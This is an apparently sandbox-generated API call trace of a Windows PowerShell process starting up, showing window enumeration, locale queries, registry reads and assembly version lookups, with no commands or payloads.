	[0364.043] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x838
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x818
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x5b8
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x494
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x1ec
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x440
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x7e8
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x730
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x2c8
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x31c
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x330
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x128
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x5c8
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x6f8
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x358
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x73c
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb0
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x250
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x240
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x790
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x61c
	[0364.044] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x568
	[0364.045] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x538
	[0364.045] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x540
	[0364.045] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x460
	[0364.045] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x79c
	[0364.045] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4e0
	[0364.045] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x460
	[0364.045] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x778
	[0364.048] WerSetFlags () returned 0x0
	[0364.054] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0364.054] CoTaskMemFree (pv=0x0) 
	[0364.055] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24db08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24db00 | out: pulNumLanguages=0x24db08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24db00) returned 1
	[0364.055] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24db08, pwszLanguagesBuffer=0x2b4e0a0, pcchLanguagesBuffer=0x24db00 | out: pulNumLanguages=0x24db08, pwszLanguagesBuffer=0x2b4e0a0, pcchLanguagesBuffer=0x24db00) returned 1
	[0364.060] CoTaskMemAlloc (cb=0x24) returned 0x163020
	[0364.060] GetUserDefaultLocaleName (in: lpLocaleName=0x163020, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0364.060] CoTaskMemFree (pv=0x163020) 
	[0364.145] CoTaskMemAlloc (cb=0x104) returned 0x168c80
	[0364.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.145] CoTaskMemFree (pv=0x168c80) 
	[0364.147] CoTaskMemAlloc (cb=0x104) returned 0x168c80
	[0364.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.147] CoTaskMemFree (pv=0x168c80) 
	[0364.149] CoTaskMemAlloc (cb=0x104) returned 0x168c80
	[0364.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.149] CoTaskMemFree (pv=0x168c80) 
	[0364.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0364.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0364.160] SetErrorMode (uMode=0x1) returned 0x1
	[0364.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24d780 | out: lpFileInformation=0x24d780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0364.160] SetErrorMode (uMode=0x1) returned 0x1
	[0364.160] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24d9f0 | out: lpdwHandle=0x24d9f0) returned 0x94c
	[0364.162] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b51930 | out: lpData=0x2b51930) returned 1
	[0364.163] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24d968, puLen=0x24d960 | out: lplpBuffer=0x24d968*=0x2b519cc, puLen=0x24d960) returned 1
	[0364.163] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51aa8, puLen=0x24d8d0) returned 1
	[0364.163] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0364.163] CoTaskMemAlloc (cb=0x2e) returned 0x1678e0
	[0364.163] lstrcpyW (in: lpString1=0x1678e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0364.163] CoTaskMemFree (pv=0x1678e0) 
	[0364.163] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51afc, puLen=0x24d8d0) returned 1
	[0364.163] lstrlenW (lpString="System.Management.Automation") returned 28
	[0364.163] CoTaskMemAlloc (cb=0x3c) returned 0x165f70
	[0364.163] lstrcpyW (in: lpString1=0x165f70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0364.163] CoTaskMemFree (pv=0x165f70) 
	[0364.163] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51b58, puLen=0x24d8d0) returned 1
	[0364.163] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0364.163] CoTaskMemAlloc (cb=0x20) returned 0x163080
	[0364.163] lstrcpyW (in: lpString1=0x163080, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0364.163] CoTaskMemFree (pv=0x163080) 
	[0364.163] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51b98, puLen=0x24d8d0) returned 1
	[0364.163] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0364.163] CoTaskMemAlloc (cb=0x44) returned 0x165f70
	[0364.163] lstrcpyW (in: lpString1=0x165f70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0364.163] CoTaskMemFree (pv=0x165f70) 
	[0364.163] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51c00, puLen=0x24d8d0) returned 1
	[0364.163] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0364.163] CoTaskMemAlloc (cb=0x76) returned 0x100040
	[0364.163] lstrcpyW (in: lpString1=0x100040, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0364.164] CoTaskMemFree (pv=0x100040) 
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51c9c, puLen=0x24d8d0) returned 1
	[0364.164] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0364.164] CoTaskMemAlloc (cb=0x44) returned 0x165f70
	[0364.164] lstrcpyW (in: lpString1=0x165f70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0364.164] CoTaskMemFree (pv=0x165f70) 
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51d00, puLen=0x24d8d0) returned 1
	[0364.164] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0364.164] CoTaskMemAlloc (cb=0x58) returned 0x124f30
	[0364.164] lstrcpyW (in: lpString1=0x124f30, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0364.164] CoTaskMemFree (pv=0x124f30) 
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51d7c, puLen=0x24d8d0) returned 1
	[0364.164] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0364.164] CoTaskMemAlloc (cb=0x20) returned 0x163080
	[0364.164] lstrcpyW (in: lpString1=0x163080, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0364.164] CoTaskMemFree (pv=0x163080) 
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x2b51a24, puLen=0x24d8d0) returned 1
	[0364.164] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0364.164] CoTaskMemAlloc (cb=0x66) returned 0x14b040
	[0364.164] lstrcpyW (in: lpString1=0x14b040, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0364.164] CoTaskMemFree (pv=0x14b040) 
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x0, puLen=0x24d8d0) returned 0
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x0, puLen=0x24d8d0) returned 0
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24d8d8, puLen=0x24d8d0 | out: lplpBuffer=0x24d8d8*=0x0, puLen=0x24d8d0) returned 0
	[0364.164] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24d8a8, puLen=0x24d8a0 | out: lplpBuffer=0x24d8a8*=0x2b519cc, puLen=0x24d8a0) returned 1
	[0364.164] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0364.164] VerLanguageNameW (in: wLang=0x0, szLang=0x1027c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0364.165] CoTaskMemFree (pv=0x1027c0) 
	[0364.165] VerQueryValueW (in: pBlock=0x2b51930, lpSubBlock="\\", lplpBuffer=0x24d8f8, puLen=0x24d8f0 | out: lplpBuffer=0x24d8f8*=0x2b51958, puLen=0x24d8f0) returned 1
	[0364.173] CoTaskMemAlloc (cb=0x104) returned 0x168c80
	[0364.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.173] CoTaskMemFree (pv=0x168c80) 
	[0364.178] CoTaskMemAlloc (cb=0x104) returned 0x168c80
	[0364.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.178] CoTaskMemFree (pv=0x168c80) 
	[0364.182] lstrlenW (lpString="䅁") returned 1
	[0364.256] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d7c8 | out: phkResult=0x24d7c8*=0x304) returned 0x0
	[0364.257] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d7b8 | out: phkResult=0x24d7b8*=0x308) returned 0x0
	[0364.258] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d848 | out: phkResult=0x24d848*=0x30c) returned 0x0
	[0364.262] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d78c, lpData=0x0, lpcbData=0x24d788*=0x0 | out: lpType=0x24d78c*=0x1, lpData=0x0, lpcbData=0x24d788*=0x56) returned 0x0
	[0364.263] CoTaskMemAlloc (cb=0x5a) returned 0x161590
	[0364.263] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d75c, lpData=0x161590, lpcbData=0x24d758*=0x56 | out: lpType=0x24d75c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d758*=0x56) returned 0x0
	[0364.263] CoTaskMemFree (pv=0x161590) 
	[0364.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0364.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0364.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0364.293] CoTaskMemAlloc (cb=0x104) returned 0x168c80
	[0364.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0364.293] CoTaskMemFree (pv=0x168c80) 
	[0364.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0364.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0365.267] CoTaskMemAlloc (cb=0x104) returned 0x16f670
	[0365.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0365.267] CoTaskMemFree (pv=0x16f670) 
	[0365.268] CoTaskMemAlloc (cb=0x104) returned 0x16f670
	[0365.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0365.268] CoTaskMemFree (pv=0x16f670) 
	[0365.423] CoTaskMemAlloc (cb=0x104) returned 0x170670
	[0365.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x170670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0365.423] CoTaskMemFree (pv=0x170670) 
	[0365.425] CoTaskMemAlloc (cb=0x104) returned 0x170670
	[0365.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x170670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0365.425] CoTaskMemFree (pv=0x170670) 
	[0365.426] CoTaskMemAlloc (cb=0x104) returned 0x170670
	[0365.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x170670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0365.426] CoTaskMemFree (pv=0x170670) 
	[0365.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0365.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0365.940] CoTaskMemAlloc (cb=0x104) returned 0x17ecf0
	[0365.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0365.940] CoTaskMemFree (pv=0x17ecf0) 
	[0365.943] CoTaskMemAlloc (cb=0x104) returned 0x17ecf0
	[0365.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0365.944] CoTaskMemFree (pv=0x17ecf0) 
	[0366.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0366.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0368.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0368.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0368.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0368.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0368.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0368.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0369.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0369.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0369.944] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0369.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0369.945] CoTaskMemFree (pv=0x1b770e10) 
	[0369.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
